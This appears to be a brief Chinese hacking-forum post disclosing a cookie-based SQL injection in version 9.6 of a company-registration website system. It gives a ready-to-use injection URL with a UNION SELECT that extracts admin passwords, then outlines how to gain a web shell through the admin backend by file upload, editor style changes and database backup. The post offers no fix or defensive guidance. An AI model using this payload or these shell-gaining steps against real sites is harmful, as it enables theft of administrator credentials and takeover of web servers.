康城公司注册类网站系统cookies注入漏洞

作者:hack1990 时间:12-06-25 阅读数:704人阅读

康城公司注册类网站系统 v9.6

cookies 注入中转

http://www.xx.com/jmcook.asp?jmdcw=17+and 1=2 union select 1,2,password,4,5,password,7,8,9,10,11,12,13 from admin

后台拿shell

cookies 名小子 可以上传

ewe 修改样式

数据库备份

插一句 建议不使用!

from:f4le.com
 

发表评论